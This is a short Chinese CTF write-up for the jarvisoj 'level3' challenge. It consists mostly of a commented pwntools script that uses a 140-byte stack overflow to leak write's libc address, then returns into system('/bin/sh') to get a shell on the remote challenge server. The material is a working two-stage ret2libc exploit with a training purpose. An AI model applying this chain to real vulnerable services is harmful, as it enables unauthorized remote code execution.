题目来自:https://www.jarvisoj.com/challenges
level3
checksec查看:
ida打开:
栈溢出,buf与ebp相距0x88(136)
一起下载到的还有个libc-2.19.so动态链接库文件,这就很好办啦!二次溢出拿到flag
直接上脚本:
# Exploit script for the jarvisoj "level3" challenge (pwntools, Python 2 print syntax).
# Two-stage ret2libc: stage 1 overflows the stack buffer so that write() leaks the
# libc address of write; stage 2 overflows again to call system("/bin/sh").
# Hardening note: the overwrite of the saved ebp / return address described below is
# exactly what a stack canary detects, and the hard-coded addresses only stay valid
# because the binary is presumably not position-independent (the checksec output is
# not reproduced on the page). The libc leak is what defeats ASLR for stage 2.
from pwn import *
#sh = process('level3')
# Challenge endpoint given in the write-up; the commented line above would run the binary locally instead.
sh = remote('pwn2.jarvisoj.com',9879)
elf = ELF('level3')                # the challenge binary
libcso = ELF('libc-2.19.so')       # libc shipped with the challenge; used only for symbol offsets
write_plt = elf.symbols['write']   # write@plt: fixed address the ROP chain can return into
write_got = elf.got['write']       # write@got: holds the runtime libc address of write, i.e. the leak target
func_addr = 0x0804844B             # address of the vulnerable function (called "vul" by the author) from the IDA analysis
# Stage 1: 0x88 (136) bytes fill buf up to the saved ebp, 4 more clobber the saved ebp
# (hence 140), then the saved return address becomes write@plt. The next word is
# write's own return address: it is set to vul so the program asks for input again and
# stage 2 can be delivered. The remaining three words are write's arguments:
# write(1, write_got, 4), which prints the 4-byte libc address of write.
payload = 'A'*140 +p32(write_plt)+p32(func_addr)+p32(1)+p32(write_got)+p32(4)
print '\n[+]-----send payload-------'
sh.recvuntil('Input:\n')           # wait for the prompt before sending
sh.send(payload)
print '\n---write()address---'
write_addr = u32(sh.recv(4))       # the 4 bytes write() emitted: libc address of write, little-endian
print 'writ_addr='+hex(write_addr)
print '\n[+]----find system() and /bin/sh-----'
# The distance between two symbols inside libc does not depend on the load base, so
# system can be located relative to the leaked write address without computing the base.
sys_addr = write_addr-(libcso.symbols['write']-libcso.symbols['system'])
print libcso.symbols['write']      # debug output: offset of write inside libc-2.19.so
binsh_addr = write_addr-(libcso.symbols['write']-next(libcso.search('/bin/sh')))  # first "/bin/sh" string in libc, same relative computation
# Stage 2: same 140-byte padding, return into system(); 'b'*4 is system's (never used)
# return address, followed by its single argument, the pointer to "/bin/sh".
payload2 = 'B'*140 +p32(sys_addr)+'b'*4+p32(binsh_addr)
print '[+]----send payload2----'
sh.recvuntil('Input:\n')           # vul ran a second time (via func_addr) and printed the prompt again
sh.send(payload2)
sh.interactive()                   # hand the resulting session over to the user
得到flag。
level4脚本没调完,明天再战